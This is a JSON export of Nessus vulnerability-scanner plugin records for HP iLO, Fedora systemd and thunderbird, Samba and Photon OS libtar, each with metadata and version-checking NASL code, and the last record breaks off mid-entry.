{"nessus": [{"lastseen": "2019-02-15T07:10:21", "bulletinFamily": "scanner", "description": "A denial of service (DoS) vulnerability exists in Integrated Lights-Out\n(iLO) due to an undisclosed vulnerability. \nAn unauthenticated, remote attacker can exploit this issue to cause \nthe application to stop responding.", "modified": "2019-02-14T00:00:00", "published": "2019-02-14T00:00:00", "id": "ILO_HPSSRT_101886.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122190", "title": "iLO 2 < 2.27 / iLO 3 < 1.82 / iLO 4 < 2.10 Denial of Service Vulnerability", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122190);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/14 14:52:48\");\n\n script_cve_id(\"CVE-2015-2106\");\n\n script_name(english:\"iLO 2 < 2.27 / iLO 3 < 1.82 / iLO 4 < 2.10 Denial of Service Vulnerability\");\n script_summary(english:\"Checks version of HP Integrated Lights-Out (iLO).\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote HP Integrated Lights-Out (iLO) server's web interface is\naffected by a denial of service vulnerability.\") ;\n script_set_attribute(attribute:\"description\", value:\n\"A denial of service (DoS) vulnerability exists in Integrated Lights-Out\n(iLO) due to an undisclosed vulnerability. \nAn unauthenticated, remote attacker can exploit this issue to cause \nthe application to stop responding.\");\n # https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04582368\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c250bedf\");\n # https://nvd.nist.gov/vuln/detail/CVE-2015-2106\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?01654ca1\");\n script_set_attribute(attribute:\"solution\", value:\n \"For iLO 2, upgrade firmware to 2.27 or later. For iLO 3, upgrade firmware to 1.82 or later.\nFor iLO 4, upgrade firmware to 2.10 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-2106\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:integrated_lights-out_firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ilo_detect.nasl\");\n script_require_keys(\"www/ilo\", \"ilo/generation\", \"ilo/firmware\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('http.inc');\ninclude('install_func.inc');\ninclude('misc_func.inc');\ninclude('vcf.inc');\n\ngeneration = get_kb_item_or_exit('ilo/generation');\nport = get_http_port(default:80, embedded: TRUE);\napp_info = vcf::get_app_info(app:'ilo', port:port, webapp:TRUE);\n\n# Firmware versions are different across generations so additional if check is required.\nif (generation == 2)\n fixed_version = '2.27';\nelse if (generation == 3)\n fixed_version = '1.82';\nelse if (generation == 4)\n fixed_version = '2.10';\nelse\n audit(\n AUDIT_WEB_APP_NOT_AFFECTED,\n 'iLO ' + generation, \n build_url2(qs:app_info.path, port:port),\n app_info.version);\n\nconstraints = [{'fixed_version':fixed_version}];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-15T07:10:21", "bulletinFamily": "scanner", "description": "An information disclosure vulnerability exists in Integrated \nLights-Out due to an unspecified vulnerability. \nAn unauthenticated, remote attacker can exploit this to \ndisclose potentially sensitive information.", "modified": "2019-02-14T00:00:00", "published": "2019-02-14T00:00:00", "id": "ILO_HPSBHF_02821.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122189", "title": "iLO 3 < 1.50 / iLO 4 < 1.13 Information Disclosure Vulnerability", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122189);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/14 14:04:59\");\n\n script_cve_id(\"CVE-2012-3271\");\n\n script_bugtraq_id(56597);\n\n script_name(english:\"iLO 3 < 1.50 / iLO 4 < 1.13 Information Disclosure Vulnerability\");\n script_summary(english:\"Checks version of HP Integrated Lights-Out (iLO).\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote HP Integrated Lights-Out (iLO) server's web interface is\naffected by an information disclosure vulnerability.\") ;\n script_set_attribute(attribute:\"description\", value:\n\"An information disclosure vulnerability exists in Integrated \nLights-Out due to an unspecified vulnerability. \nAn unauthenticated, remote attacker can exploit this to \ndisclose potentially sensitive information.\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c03515413&docLocale=en_US\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6d1b5324\");\n script_set_attribute(attribute:\"solution\", value:\n \"For iLO 3, upgrade firmware to 1.50 or later. \n For iLO 4, upgrade firmware to 1.13 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-3271\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/11/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:integrated_lights-out_firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ilo_detect.nasl\");\n script_require_keys(\"www/ilo\", \"ilo/generation\", \"ilo/firmware\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('http.inc');\ninclude('install_func.inc');\ninclude('misc_func.inc');\ninclude('vcf.inc');\n\ngeneration = get_kb_item_or_exit('ilo/generation');\nport = get_http_port(default:80, embedded: TRUE);\napp_info = vcf::get_app_info(app:'ilo', port:port, webapp:TRUE);\n\n# Firmware versions are different across generations so additional if check is required.\nif (generation == 3)\n fixed_version = '1.50';\nelse if (generation == 4)\n fixed_version = '1.13';\nelse\n audit(\n AUDIT_WEB_APP_NOT_AFFECTED,\n 'iLO ' + generation, \n build_url2(qs:app_info.path, port:port),\n app_info.version);\n\nconstraints = [{'fixed_version':fixed_version}];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-15T07:10:21", "bulletinFamily": "scanner", "description": "According to its version number, the firmware of Integrated Lights-Out\nrunning on the remote web server is iLO 3 prior to 1.65 or iLO 4 \nprior to 1.32. It is, therefore, affected by multiple vulnerabilities:\n - A cross-site scripting (XSS) vulnerability exists due to improper\n validation of user-supplied input before returning it to users. \n An unauthenticated, remote attacker can exploit this, by convincing\n a user to click a specially crafted URL, to execute arbitrary script\n code in a user's browser session (CVE-2013-4842).\n\n - An information disclosure vulnerability exists in Integrated \n Lights-Out (iLO) 3 & 4 due to an undisclosed vulnerability. \n An unauthenticated, remote attacker can exploit this to disclose\n potentially sensitive information (CVE-2013-4843).", "modified": "2019-02-14T00:00:00", "published": "2019-02-14T00:00:00", "id": "ILO_HPSBHF_02939.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122188", "title": "iLO 3 < 1.65 / iLO 4 < 1.32 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122188);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/14 13:48:00\");\n\n script_cve_id(\n \"CVE-2013-4842\",\n \"CVE-2013-4843\"\n );\n\n script_bugtraq_id(\n 63689,\n 63691\n );\n\n script_name(english:\"iLO 3 < 1.65 / iLO 4 < 1.32 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of HP Integrated Lights-Out (iLO).\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote HP Integrated Lights-Out (iLO) server's web interface is\naffected by multiple vulnerabilities.\") ;\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the firmware of Integrated Lights-Out\nrunning on the remote web server is iLO 3 prior to 1.65 or iLO 4 \nprior to 1.32. It is, therefore, affected by multiple vulnerabilities:\n - A cross-site scripting (XSS) vulnerability exists due to improper\n validation of user-supplied input before returning it to users. \n An unauthenticated, remote attacker can exploit this, by convincing\n a user to click a specially crafted URL, to execute arbitrary script\n code in a user's browser session (CVE-2013-4842).\n\n - An information disclosure vulnerability exists in Integrated \n Lights-Out (iLO) 3 & 4 due to an undisclosed vulnerability. \n An unauthenticated, remote attacker can exploit this to disclose\n potentially sensitive information (CVE-2013-4843).\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c03996804&docLocale=en_US\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?aaf46ad1\");\n script_set_attribute(attribute:\"solution\", value:\n \"For iLO 3, upgrade firmware to 1.65 or later. \n For iLO 4, upgrade firmware to 1.32 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-4842\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:integrated_lights-out_firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ilo_detect.nasl\");\n script_require_keys(\"www/ilo\", \"ilo/generation\", \"ilo/firmware\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('http.inc');\ninclude('install_func.inc');\ninclude('misc_func.inc');\ninclude('vcf.inc');\n\ngeneration = get_kb_item_or_exit('ilo/generation');\nport = get_http_port(default:80, embedded: TRUE);\napp_info = vcf::get_app_info(app:'ilo', port:port, webapp:TRUE);\n\n# Firmware versions are different across generations so additional if check is required.\nif (generation == 3)\n fixed_version = '1.65';\nelse if (generation == 4)\n fixed_version = '1.32';\nelse\n audit(\n AUDIT_WEB_APP_NOT_AFFECTED,\n 'iLO ' + generation, \n build_url2(qs:app_info.path, port:port),\n app_info.version);\n\nconstraints = [{'fixed_version':fixed_version}];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-12T03:01:03", "bulletinFamily": "scanner", "description": "- Fix large memory usage by systemd-journald (#1665931)\n\n - Some minor fixes to systemd-nspawn, udevadm,\n documentation and logging\n\nNo need to log out or reboot.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "modified": "2019-02-11T00:00:00", "published": "2019-02-11T00:00:00", "id": "FEDORA_2019-1FB1547321.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122071", "title": "Fedora 29 : systemd (2019-1fb1547321)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-1fb1547321.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122071);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/11 11:26:49\");\n\n script_xref(name:\"FEDORA\", value:\"2019-1fb1547321\");\n\n script_name(english:\"Fedora 29 : systemd (2019-1fb1547321)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Fix large memory usage by systemd-journald (#1665931)\n\n - Some minor fixes to systemd-nspawn, udevadm,\n documentation and logging\n\nNo need to log out or reboot.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-1fb1547321\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected systemd package.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:systemd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"systemd-239-11.git4dc7dce.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"systemd\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-12T03:01:03", "bulletinFamily": "scanner", "description": "- Updated to latest version (60.5.0) \n\n- https://www.thunderbird.net/en-US/thunderbird/60.5.0/releasenotes/\n\n - Backported Wayland patches from Firefox 65.0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "modified": "2019-02-11T00:00:00", "published": "2019-02-11T00:00:00", "id": "FEDORA_2019-526EF126CD.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122072", "title": "Fedora 29 : thunderbird (2019-526ef126cd)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-526ef126cd.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122072);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/11 11:26:49\");\n\n script_xref(name:\"FEDORA\", value:\"2019-526ef126cd\");\n\n script_name(english:\"Fedora 29 : thunderbird (2019-526ef126cd)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Updated to latest version (60.5.0) \n\n- https://www.thunderbird.net/en-US/thunderbird/60.5.0/releasenotes/\n\n - Backported Wayland patches from Firefox 65.0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-526ef126cd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected thunderbird package.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"thunderbird-60.5.0-4.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-10T15:00:38", "bulletinFamily": "scanner", "description": "The version of Samba running on the remote host is prior to\n3.4.0. It is, therefore, affected by a remote code execution\nvulnerability in process.c due to a heap-based buffer overflow. An \nunauthenticated, remote attacker can exploit this to bypass authentication \nand execute arbitrary commands via Batched / AndX request.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "modified": "2019-02-08T00:00:00", "published": "2019-02-08T00:00:00", "id": "SAMBA_3_4_0.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122058", "title": "Samba < 3.4.0 Remote Code Execution Vulnerability", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122058);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/08 15:02:57\");\n\n script_cve_id(\n \"CVE-2012-0870\"\n );\n script_bugtraq_id(52103);\n\n script_name(english:\"Samba < 3.4.0 Remote Code Execution Vulnerability\");\n script_summary(english:\"Checks the version of Samba.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Samba server is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Samba running on the remote host is prior to\n3.4.0. It is, therefore, affected by a remote code execution\nvulnerability in process.c due to a heap-based buffer overflow. An \nunauthenticated, remote attacker can exploit this to bypass authentication \nand execute arbitrary commands via Batched / AndX request.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/security/CVE-2012-0870.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Samba version 3.4.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-0870\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:samba:samba\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_nativelanman.nasl\");\n script_require_keys(\"SMB/NativeLanManager\", \"SMB/samba\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = vcf::samba::get_app_info();\nvcf::check_granularity(app_info:app, sig_segments:3);\n\nconstraints = \n[\n {\"fixed_version\" : \"3.4.0\"}\n];\n\nvcf::check_version_and_report(app_info:app, constraints:constraints, severity:SECURITY_HOLE, strict:FALSE);\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-08T12:51:52", "bulletinFamily": "scanner", "description": "An update of the libtar package has been released.", "modified": "2019-02-07T00:00:00", "published": "2019-02-07T00:00:00", "id": "PHOTONOS_PHSA-2017-0040_LIBTAR.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=121744", "title": "Photon OS 1.0: Libtar PHSA-2017-0040", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0040. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121744);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/07 18:14:47\");\n\n script_cve_id(\"CVE-2013-4420\");\n\n script_name(english:\"Photon OS 1.0: Libtar PHSA-2017-0040\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the libtar package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-80.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10309\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:libtar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"libtar-1.2.20-3.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"libtar-devel-1.2.20-3.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libtar\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-08T12:51:57", "bulletinFamily": "scanner", "description": "An update of the libtar package has been released.", "modified": "2019-02-07T00:00:00", "published": "2019-02-07T00:00:00", "id": "PHOTONOS_PHSA-2018-2_0-0029_LIBTAR.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=121929", "title": "Photon OS 2.0: Libtar PHSA-2018-2.0-0029", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-2.0-0029. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121929);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/07 18:14:47\");\n\n script_cve_id(\"CVE-2013-4420\");\n\n script_name(english:\"Photon OS 2.0: Libtar 